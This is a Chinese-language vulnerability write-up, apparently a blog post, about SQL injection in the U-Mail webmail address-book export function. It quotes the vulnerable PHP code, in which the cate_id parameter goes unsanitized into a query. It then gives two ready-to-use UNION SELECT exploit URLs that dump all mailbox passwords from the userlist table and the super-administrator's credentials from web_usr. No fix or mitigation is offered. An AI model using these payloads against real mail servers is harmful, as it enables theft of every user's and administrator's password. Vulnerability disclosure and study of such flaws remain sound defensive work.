U-Mail邮件服务系统存在漏洞可获取所有用户密码

/client/cab/module/operates.php [php] getCategoryByDomainID( $domain_id, 0 ); $where = "domain_id='".$domain_id."'"; if ( $cate_id == "-1" ) { $cate_id = 0; } if ( $cate_id ) { $Tree = $CAB->getTreeObject( ); $Tree->set_data_cache( $data_cache ); $Tree->sort_data( -1, 1 ); $cate_ids = $Tree->get_child_id( $cate_id ); $where .= " AND cate_id IN (".$cate_ids.")"; //直接带入了where in } $customer_list = $CAB->get_customer( array( "fields" => "*", "where" => $where, "debug" => 0 ) ); $cate_list = create_array $data_cache, "cate_id", "name" ); $string = "\"".el( "名称", "" )."\",\"".el( "邮箱", "" )."\",\"".el( "电话号码", "" )."\",\"".el( "分类", "" )."\",\"".el( "备注", "" )."\",\"".el( "生日", "" )."\",\"".el( "性别", "" )."\",\"".el( "单位电话", "" )."\",\"".el( "住宅电话", "" )."\",\"".el( "QQ", "" )."\",\"".el( "MSN", "" )."\"\n"; if ( $customer_list ) { foreach ( $customer_list as $user ) { $string .= "\"".$user['fullname']."\","; $string .= "\"".$user['pref_email']."\","; $string .= "\"".$user['pref_tel']."\","; $string .= "\"".$cate_list[$user['cate_id']]."\","; $string .= "\"".$user['remark']."\","; $string .= "\"".$user['birthday']."\","; $string .= "\"".$user['gender']."\","; $string .= "\"".$user['work_tel']."\","; $string .= "\"".$user['home_tel']."\","; $string .= "\"".$user['im_qq']."\","; $string .= "\"".$user['im_msn']."\","; $string .= "\r\n"; } } } if ( get_session( "language" ) == "zh" ) { $out_data = iconv( "UTF-8", "GBK", $string ); } else { $out_data = $string; } header( "Content-type: text/plain" ); header( "Content-Disposition: attachment; filename=Address.csv" ); header( "Cache-Control: must-revalidate, post-check=0, pre-check=0" ); header( "Expires: 0" ); header( "Pragma: public" ); echo $out_data; exit( ); } ............... ?> [/php] $where .= " AND cate_id IN (".$cate_ids.")"; 带入查询。 [php] http://192.168.0.119/webmail/client/cab/index.php?module=operate&action=customer-export&cate_id=0) union select 1,2,3,mailbox,5,6,password,8,9,10,11,12,13,14,15 from userlist%23 [/php] 8 9 超级管理员在这个表,同样一键脱下所有 [php] http://192.168.0.119/webmail/client/cab/index.php?module=operate&action=customer-export&cate_id=0) union select 1,2,3,usr_name,5,6,password,8,9,10,11,12,13,14,15 from web_usr%23 [/php]

发表评论